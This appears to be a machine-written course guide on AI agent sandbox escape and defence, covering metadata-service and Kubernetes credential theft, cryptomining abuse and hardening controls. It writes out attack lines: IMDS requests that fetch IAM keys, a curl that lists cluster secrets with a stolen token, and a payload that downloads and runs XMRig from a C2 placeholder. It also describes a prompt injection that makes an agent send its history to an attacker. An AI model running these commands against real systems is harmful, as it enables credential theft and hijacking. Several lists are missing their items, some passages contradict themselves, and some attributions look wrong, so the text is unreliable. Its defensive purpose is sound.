In April 2023, security researchers at Wiz disclosed that they had obtained a cross-tenant service account token from within a Hugging Face Spaces container. The token granted read access to private model artifacts belonging to other tenants. The vector was not a kernel exploit — it was an overly permissive IAM role attached to the underlying EC2 instance, reachable from inside any container running on that host via the instance metadata service (IMDS) at 169.254.169.254. The agent workload never needed to escape the container namespace; it simply made an unauthenticated HTTP GET from inside its allowed network context.
Traditional sandboxes confine processes that execute static, known code. AI agent sandboxes must confine processes that generate and execute novel code at runtime — code that the sandbox designer never reviewed. This creates a fundamentally different threat surface. The agent's tool-use loop may invoke shell commands, write files, make outbound network calls, and spawn child processes, all as first-class designed behaviors. The attacker's goal is to chain those permitted behaviors into something the sandbox was not designed to allow.
Sandbox escape in the AI agent context falls into three broad families: namespace escapes (exploiting Linux kernel primitives), metadata service abuse (reaching cloud provider control planes from inside allowed network context), and volume mount exploitation (writing to host-mounted paths). A fourth, increasingly relevant family is agent-driven privilege escalation — where the agent's own tool calls assemble an escape without any single call crossing a policy boundary.
Container runtimes like Docker and containerd isolate workloads using Linux namespaces (PID, NET, MNT, UTS, IPC, USER) and cgroups. Breakouts typically require a privileged capability not stripped at runtime. The most commonly abused:
/proc/sysrq-trigger or use nsenter to re-enter the host namespace. Many AI agent orchestrators grant this for "ease of tool use."
From inside a suspected agent container, run: capsh --print to list current capabilities; check mount | grep proc for overmounted /proc; inspect ls -la /var/run/docker.sock for socket exposure; and attempt curl -s http://169.254.169.254/latest/meta-data/ for IMDS reachability. Any of these returning unexpected output indicates a misconfiguration worth escalating.
The Hugging Face incident illustrates the canonical IMDS attack path. The instance metadata service runs on a link-local address reachable from any process on the EC2 instance, including containers running on it, unless the operator has configured IMDSv2 (which requires a PUT before GET, making it harder to reach from SSRF vectors) and blocked the address at the container network level.
An agent with any outbound HTTP tool capability can silently reach the IMDS and retrieve the instance role credentials in a single tool call. Those credentials may have permissions extending far beyond the agent's intended scope — S3 buckets, Secrets Manager entries, or even IAM privilege escalation paths.
# Tool call the agent makes (appears legitimate)
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Response reveals role name, then:
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# Returns:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2023-04-14T18:29:00Z"
}
IMDSv2 alone is insufficient if agents have unrestricted outbound HTTP. The PUT-before-GET requirement stops SSRF-style reaches but not direct tool calls. Network-level blocking of 169.254.169.254 at the container network interface is required. AWS recommends restricting instance profiles to least-privilege and enabling IMDSv2 hop limit of 1 to prevent container-level access.
CVE-2019-5736, disclosed by Dragos Rusu and Adam Iwaniuk in February 2019, demonstrated that a malicious container could overwrite the host runc binary by racing a file descriptor opened during container execution. The technique required the attacker to control code executing inside the container — exactly the position an AI agent code-execution tool grants. Patched runc versions closed this specific race, but the architectural lesson persists: any code executing inside a container can observe and interact with the host runtime's filesystem operations if the runtime itself runs as root without additional namespace isolation.
Subsequent variants (CVE-2021-30465 for runc mount handling, CVE-2022-0492 for cgroup v1 release_agent) each exploited the same principle: the boundary between container and host is enforced by userspace software running on a shared kernel. Any bug in that software, or any excessive capability granted to the container, collapses the boundary.
When assessing an AI agent deployment for sandbox escape risk, the methodology follows four phases:
capsh --print, /proc/self/status (CapEff field), and checking --security-opt flags in the orchestration configuration.CVE-2022-0492 (CVSS 7.8): A flaw in Linux kernel cgroup v1 release_agent handling allowed an unprivileged user inside a container to escape if the container had CAP_SYS_ADMIN or if user namespaces were misconfigured. This remained unpatched in many cloud provider managed Kubernetes node images for over three months after disclosure. AI agent workloads on those node versions were trivially escapable if the agent could execute shell commands.
You are a pentester who has achieved code execution inside an AI agent container. Your task is to enumerate the escape surface: capabilities, mounts, network reach, and runtime version. The AI assistant will guide you through the recon process, explain what each finding means, and help you prioritize which vectors are worth escalating.
The Capital One breach, executed by Paige Thompson in July 2019, is the canonical SSRF-to-IMDS attack case. Thompson exploited a misconfigured WAF running on an EC2 instance, used server-side request forgery to reach 169.254.169.254, retrieved an IAM role credential with broad S3 permissions, and exfiltrated approximately 100 million customer records. While not an AI agent attack, the technique is directly applicable to any agent with an HTTP fetch tool and network access to IMDS. The underlying vulnerability — no IMDSv2 enforcement, overly permissive instance role — is reproduced in thousands of AI agent deployments today.
Every major cloud provider exposes an instance metadata service reachable from the instance (and its containers) on a well-known link-local address. AWS uses 169.254.169.254; Azure uses the same address plus 169.254.169.253 for DHCP; GCP uses metadata.google.internal (resolving to 169.254.169.254) and the FQDN metadata.google.internal. All three provide unauthenticated access to instance credentials from within the instance's network namespace.
An AI agent with any HTTP tool — including tools framed as "web browsing," "URL fetcher," "API caller," or "research assistant" — can reach these endpoints. Unlike a human-operated SSRF, the agent may have been instructed by a malicious prompt to make exactly this request while performing an apparently legitimate task.
| Provider | Endpoint | Credential Path | Default Protection |
|---|---|---|---|
| AWS | 169.254.169.254 |
/latest/meta-data/iam/security-credentials/<role> |
IMDSv2 (opt-in until 2024); hop-limit 1 |
| Azure | 169.254.169.254 |
/metadata/instance?api-version=2021-02-01 + Metadata:true header |
Required header — stops basic SSRF but not tool calls |
| GCP | metadata.google.internal |
/computeMetadata/v1/instance/service-accounts/default/token |
Required header: Metadata-Flavor: Google |
Azure and GCP require a custom header (Metadata: true and Metadata-Flavor: Google respectively). This stops classic SSRF via image tags or redirects, but does NOT stop an AI agent whose HTTP tool can set arbitrary headers. Pentesters must test with full header control, not just bare GET requests.
Credentials are the most targeted IMDS output, but the endpoint exposes significantly more information useful for lateral movement and escalation:
/latest/user-data with no additional authentication./latest/meta-data/public-keys/. Knowing the key name and fingerprint narrows the attack surface for lateral SSH movement.When AI agents run inside Kubernetes pods, a different credential source becomes relevant: the service account token automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. This JWT can be used to authenticate to the Kubernetes API server.
The Azurescape vulnerability (disclosed by Palo Alto Unit 42 in August 2021, CVE-2021-25741 adjacent) demonstrated that cross-tenant Kubernetes API access was possible from within a compromised pod in Azure Container Instances. An agent capable of reading its own filesystem can exfiltrate the service account token in a single file read operation.
# Agent reads its own service account token:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Then queries the K8s API with it:
curl -k -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" \
https://kubernetes.default.svc/api/v1/namespaces/default/secrets
# If the service account has get/list on secrets:
# All secrets in the namespace are now exposed
The most common Kubernetes RBAC misconfiguration seen in AI agent deployments is granting the agent's service account cluster-admin or wildcard resource access so that the agent can "manage Kubernetes resources as a tool." This gives the agent — and any attacker who controls the agent — full cluster access from within a single pod.
Once credentials are obtained, the agent's existing tool suite becomes the exfiltration mechanism. An agent with file-write and HTTP-post tools can write credentials to disk, construct a signed AWS API request, and exfiltrate data without invoking any capability outside its normal operation profile. This is why behavioral detection — anomaly detection on tool call sequences — is more reliable than any single policy check.
The 2024 PromptArmor research on indirect prompt injection demonstrated live exfiltration from a GPT-4-powered assistant: a malicious document caused the agent to silently POST its conversation history (which included retrieved credentials) to an attacker-controlled endpoint using the agent's own web request tool. The agent reported success on the original task. No error was raised. The exfiltration was invisible in the response.
When testing an AI agent for credential theft risk: (1) Determine whether the agent has any HTTP fetch capability. (2) Check whether 169.254.169.254 is reachable from the agent's network namespace. (3) Attempt a direct IMDS GET as a tool call. (4) Check /var/run/secrets/ for K8s service account tokens. (5) Read any .env, .aws/credentials, or application config files in the agent's working directory. Document all findings — the goal is a complete picture of every credential the agent could access, not just the most obvious one.
You are assessing an AI agent deployed on AWS EKS (Elastic Kubernetes Service). The agent has a web-browsing tool and file-read capabilities. Your goal is to enumerate all credential sources it can access and assess the blast radius of each. The assistant will help you construct test cases and interpret what you find.
TeamTNT, tracked by Trend Micro and Cado Security from 2020 onward, specialized in targeting misconfigured container infrastructure for cryptomining. Their technique: scan for exposed Docker daemons (port 2375/2376), deploy XMRig or similar Monero miners, and in later campaigns, specifically target Jupyter notebook servers — an early form of AI/ML compute abuse. By 2021 their tooling included credential harvesters targeting ~AWS ~/.aws/credentials and Kubernetes config files. The same infrastructure used to run ML experiments was repurposed for mining within minutes of compromise. Container CPU quotas that should have limited blast radius were absent in the majority of compromised targets.
AI agent infrastructure is particularly attractive for resource abuse because it is designed to consume significant compute. Anomalous CPU or memory usage from a cryptominer is easy to distinguish from a web server; it blends in with an AI inference workload. Network egress that would trigger alerts on a standard application server is routine for an agent making API calls and fetching external data. This camouflage effect makes AI agent infrastructure a high-value target for attacker-controlled workload injection.
Resource abuse falls into four categories in the AI agent context:
Jupyter notebook servers, commonly used to develop and test AI agents, are a documented cryptomining target. Exposed notebooks (no authentication, or with predictable tokens) allow attackers to execute arbitrary Python, which trivially includes subprocess calls to download and run XMRig. The 2020 Aqua Security threat intelligence report documented over 13,000 exposed Jupyter instances and observed cryptomining injection within minutes of exposure for honeypot instances.
The pattern extends to any AI agent framework that exposes a code execution endpoint: LangChain's local server mode, AutoGPT instances with a web interface, and custom agent APIs that allow code submission. Any endpoint that accepts and executes code without authentication is a cryptomining substrate.
# Typical TeamTNT payload delivered via exposed Jupyter notebook:
import subprocess
subprocess.Popen([
'wget', '-q',
'http://[C2-IP]/xmrig',
'-O', '/tmp/.cache/xmrig'
])
subprocess.Popen(['chmod', '+x', '/tmp/.cache/xmrig'])
subprocess.Popen([
'/tmp/.cache/xmrig',
'--algo', 'rx/0',
'-o', 'pool.supportxmr.com:3333',
'--threads', '8' # Consumes all available CPU
])
XMRig and similar miners generate distinctive network signatures: outbound connections to mining pool hostnames (pool.supportxmr.com, xmrpool.eu, etc.) or pool IPs on ports 3333, 5555, or 4444; Stratum protocol traffic; and sustained high CPU with low memory I/O ratio. AI agent monitoring should include outbound connection destination analysis, not just HTTP content inspection.
An AI agent's outbound network access is granted for legitimate purposes: fetching URLs, calling APIs, sending notifications. An attacker who controls the agent's prompt can redirect this egress capability. The 2023 OWASP LLM Top 10 lists "Excessive Agency" as LLM06 — the condition where an agent has more network, compute, or storage access than its task requires. That excess access is directly exploitable for network abuse.
Port scanning from agent infrastructure is particularly damaging because: (1) the agent's IP has a clean reputation, (2) scan traffic appears as normal outbound from a legitimate cloud customer, and (3) the agent can distribute scans across many target IPs in what appears to be routine API calls or URL fetches. This technique has been observed in post-compromise scenarios where compromised CI/CD agents with broad network access were used to scan internal network ranges.
A category unique to AI agent systems: an attacker who can influence the agent's behavior (via prompt injection, malicious tool outputs, or direct API access) can cause it to issue massive numbers of LLM API calls. This does not require code execution — it requires only the ability to cause the agent to enter a loop or process an arbitrarily large input.
The sponge attack technique, described in academic literature by Shumailov et al. (2021), demonstrates that inputs can be crafted to maximize inference compute consumption by targeted LLM deployments. Applied to an agentic system, a crafted document could cause an agent to spend minutes of inference time per document, exhaust its API quota, and either fail its primary task or generate costs that exceed any expected budget.
AWS bills compute costs in real time. A misconfigured AI agent with no spending limits that is hijacked for cryptomining or caused to make excessive API calls can generate thousands of dollars in charges before automated billing alerts fire. Organizations running AI agents on cloud infrastructure should set hard spending limits, CloudWatch billing alarms, and consider AWS Cost Anomaly Detection as an early warning mechanism.
Distinguishing resource abuse from normal AI agent behavior requires baseline-relative analysis. A well-instrumented agent deployment should capture:
You are reviewing monitoring data from an AI agent fleet and have noticed anomalies. Your task is to analyze the telemetry, determine whether resource abuse is occurring, identify the abuse type, and recommend containment steps. The assistant will help you interpret signals and construct detection rules.
At AWS Re:Inforce 2023, the Amazon security team presented their internal approach to containing agentic workloads: cell-based architecture where each agent instance runs in a dedicated AWS Firecracker microVM with no shared kernel, no shared instance, and no IMDS access (IMDSv2 disabled at the VPC level). Firecracker — the same hypervisor underlying AWS Lambda — provides kernel-level isolation rather than namespace-level isolation. The escape surface is reduced to hypervisor vulnerabilities rather than container runtime vulnerabilities. The practical cost: ~125ms cold start latency per agent invocation. For most enterprise agent deployments, this is acceptable. For real-time interactive agents, it requires architectural adjustments.
No single control eliminates sandbox escape risk. The goal is to increase the number of controls an attacker must bypass, reduce the blast radius when one layer fails, and ensure that detection can identify the failure before full compromise occurs. The following framework organizes controls from innermost (agent process) to outermost (cloud account):
| Layer | Control | Threat Addressed | Implementation |
|---|---|---|---|
| Process | Drop all capabilities; use seccomp default-deny | Kernel namespace escape via CAP_SYS_ADMIN and siblings | --cap-drop=ALL --security-opt seccomp=profile.json |
| Container | Read-only root filesystem; tmpfs for /tmp | Malware staging in container filesystem | --read-only --tmpfs /tmp:size=50m |
| Runtime | gVisor (runsc) or Firecracker isolation | runc CVEs and shared kernel exploitation | RuntimeClass: gvisor in Kubernetes pod spec |
| Network | Block 169.254.169.254 at CNI level; allow-list egress | IMDS credential theft | NetworkPolicy or iptables rule pre-container start |
| Identity | Dedicated least-privilege service account; no cluster-admin | K8s API abuse via service account token | RBAC with explicit verb/resource grants only |
| Account | Hard spending limits; Cost Anomaly Detection; separate billing account | LLM API cost abuse; compute hijacking | AWS Budgets; GCP quota limits; Azure cost alerts |
Google's gVisor (open-sourced 2018) interposes a user-space kernel between container processes and the host Linux kernel. Container syscalls are handled by the Sentry (gVisor's kernel implementation) rather than passed directly to the host. This means that the container cannot reach host kernel vulnerabilities directly — it must first compromise the Sentry.
Google Cloud's GKE Sandbox uses gVisor for untrusted workloads. The GKE documentation explicitly recommends it for "workloads that execute untrusted code" — a description that accurately characterizes any AI agent that executes LLM-generated code. The performance overhead is approximately 10–20% for typical workloads, increasing for syscall-intensive operations.
gVisor does not prevent IMDS access (it operates at the syscall level, not the network level), and does not prevent a container from using its permitted network access to reach internal services. It is a kernel isolation control, not a network isolation control.
Blocking IMDS at the network level is the most reliable protection against credential theft via metadata service. The implementation depends on the deployment environment:
iptables -I DOCKER-USER -d 169.254.169.254 -j DROP before starting agent containers. This rule persists across container restarts but must be applied to each host.aws ec2 describe-instances --query 'Reservations[].Instances[].MetadataOptions'.IMDSv2 uses a PUT request to obtain a session token before GETs are accepted. By setting the instance metadata hop limit to 1 (the default is 1 for new instances as of 2024), the PUT TTL value is decremented to 0 before it exits the instance network interface. Container packets traversing the virtual NIC have already consumed one TTL hop. This means the container's PUT never reaches the IMDS, and no session token is issued — blocking all IMDSv2 access from containers without blocking it from processes on the host itself.
Cgroup-based resource limits are a necessary but insufficient control against resource abuse. A container CPU limit of 0.5 cores prevents a miner from consuming all host CPU, but the miner still runs, generates costs, and produces external network signatures. Resource limits should be set at realistic values based on measured normal agent behavior, not arbitrary defaults. Limits set too high provide no meaningful protection; limits set too low cause legitimate agent task failures.
In Kubernetes, resource limits should be set in the pod spec for both requests and limits. Requests affect scheduling; limits affect cgroup enforcement. For AI agent pods, set CPU limits based on 95th percentile observed inference CPU, and memory limits based on maximum expected context size plus a 20% buffer.
# Kubernetes resource limits for AI agent pod
resources:
requests:
cpu: "500m"
memory: "1Gi"
limits:
cpu: "2000m" # 2 cores max — limits miner impact
memory: "4Gi" # Prevents memory-based DoS
ephemeral-storage: "1Gi" # Prevents storage abuse
Falco (CNCF, originally from Sysdig) uses eBPF to observe kernel syscalls and generate alerts on anomalous behavior. For AI agent sandboxes, the most valuable Falco rules are those that detect: unexpected process spawning from the agent runtime, outbound connections to unexpected destinations, writes to executable paths outside expected working directories, and attempts to read sensitive filesystem paths like /proc/self/mem or service account tokens.
The 2022 Sysdig Threat Research Team documented a Falco rule set specifically targeting cryptominer behavior: detection of processes whose binary names match known miner hashes, and detection of connections to mining pool hostnames extracted from public threat intelligence feeds. These rules run at kernel level with negligible performance overhead and cannot be evaded by the container process itself.
After implementing defenses, validate with the following tests: (1) Attempt IMDS GET from inside agent container — should receive connection refused or timeout. (2) Attempt to read /var/run/secrets/ — verify mount is absent or the service account token has minimal RBAC. (3) Check capsh --print — verify CapEff shows no dangerous capabilities. (4) Attempt to spawn a process outside the expected agent runtime — verify Falco generates an alert. (5) Attempt to write an executable to /tmp — verify it is either blocked (read-only filesystem) or immediately detected. Document pass/fail for each test with evidence.
A service mesh (Istio, Linkerd) provides mutual TLS between services and allows policy-based enforcement of which agent pods can communicate with which internal services. This adds an authentication layer that is independent of network-level IP allow-lists. Even if an agent escapes its container namespace, the service mesh sidecar enforces identity-based policy — the escaped process does not have the service account certificate required to authenticate to other services.
Zero-trust networking for AI agents means: no agent can call any internal service by default. Each inter-service communication requires an explicit policy grant. This is operationally demanding but dramatically reduces the blast radius of any single agent compromise.
Your organization is deploying a LangChain-based AI agent on AWS EKS. The agent has web-browsing, file-read, shell-execution, and external API call tools. You need to design the complete security configuration: container hardening, network controls, RBAC, runtime isolation, and detection. The assistant will review your proposed configurations and identify gaps.